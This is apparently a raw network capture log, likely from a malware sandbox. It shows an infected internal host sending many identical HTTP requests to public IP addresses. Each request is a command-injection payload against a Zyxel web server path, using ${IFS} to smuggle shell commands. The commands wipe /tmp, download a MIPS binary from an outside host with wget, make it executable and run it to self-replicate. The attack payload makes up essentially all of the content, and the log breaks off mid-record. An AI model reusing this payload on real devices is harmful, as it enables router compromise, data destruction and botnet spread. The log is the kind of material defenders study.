                                        Mar 31, 2024 09:22:44.886838913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9253192.168.2.234989838.108.74.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.886883974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9254192.168.2.2354894188.191.178.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.886931896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9255192.168.2.235517450.185.2.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.886981964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9256192.168.2.235695057.46.62.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.887029886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9257192.168.2.2343720184.227.84.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.887073994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9258192.168.2.234566465.189.37.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.887128115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9259192.168.2.235014438.117.144.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.887162924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9260192.168.2.2339826204.150.98.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.887196064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9261192.168.2.233682673.141.8.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.887236118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9262192.168.2.2340186115.68.196.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.887291908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9263192.168.2.23487969.185.55.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.887331963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9264192.168.2.2335004196.240.19.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.887382030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9265192.168.2.2339540199.222.47.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.887414932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9266192.168.2.2359842186.130.65.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.887459993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9267192.168.2.233676293.91.127.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.887500048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9268192.168.2.2348916216.3.46.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.887538910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9269192.168.2.234350644.174.34.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.887571096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9270192.168.2.2334976180.237.125.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.887623072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9271192.168.2.2342538129.120.157.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.887671947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9272192.168.2.2355992209.191.54.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.887712002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9273192.168.2.2333336167.99.62.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.887739897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9274192.168.2.234655240.104.168.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.887793064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9275192.168.2.2343778171.8.56.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.887852907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9276192.168.2.2338832150.84.139.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.887886047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9277192.168.2.235028874.242.82.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.887917042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9278192.168.2.2335672208.48.130.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.887968063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9279192.168.2.234334812.127.206.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.888016939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9280192.168.2.2341436220.235.195.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.888073921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9281192.168.2.234361448.26.168.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.888125896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9282192.168.2.234488463.155.240.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.888163090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9283192.168.2.234562494.109.52.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.888209105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9284192.168.2.234500881.43.103.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.888248920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9285192.168.2.2360742191.134.164.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.888300896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9286192.168.2.235871690.35.22.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.888340950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9287192.168.2.2351916105.217.204.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.888375044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9288192.168.2.2348504208.243.108.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.888432980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9289192.168.2.2354760212.150.78.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.888480902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9290192.168.2.2345982197.156.57.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.888545036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9291192.168.2.2350030135.89.215.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.888571978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9292192.168.2.234849827.227.111.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.888603926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9293192.168.2.2353302223.95.92.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.888648987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9294192.168.2.2351586198.42.223.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.888715982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9295192.168.2.235309694.30.44.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.888777018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9296192.168.2.235645844.248.67.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.888817072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9297192.168.2.2347978183.82.131.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.888863087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9298192.168.2.2339586211.27.91.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.888900042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9299192.168.2.2334346178.174.172.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.888932943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9300192.168.2.235230644.84.149.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.895935059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9301192.168.2.2354440190.72.168.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.895967007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9302192.168.2.233674227.73.172.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.896006107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9303192.168.2.235548663.89.243.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.896058083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9304192.168.2.2349338169.212.49.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.896105051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9305192.168.2.234830840.47.41.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.896147966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9306192.168.2.235950037.214.232.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.896197081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9307192.168.2.2350928135.26.10.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.896249056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9308192.168.2.233389647.89.142.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.896292925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9309192.168.2.234354663.119.158.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.896332979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9310192.168.2.2333380117.42.123.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.896404028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9311192.168.2.233915244.123.248.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.896435976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9312192.168.2.236033485.78.157.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.896480083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9313192.168.2.2347922207.181.56.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.896509886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9314192.168.2.234977613.95.251.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.896564960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9315192.168.2.2347838217.197.6.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.896606922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9316192.168.2.233757873.82.207.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.896689892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9317192.168.2.2354458201.64.213.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.896712065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9318192.168.2.233565471.229.37.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.896764040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9319192.168.2.2347596166.21.23.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.896807909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9320192.168.2.235488457.252.146.47443
                                        TimestampBytes transferredDirectionData
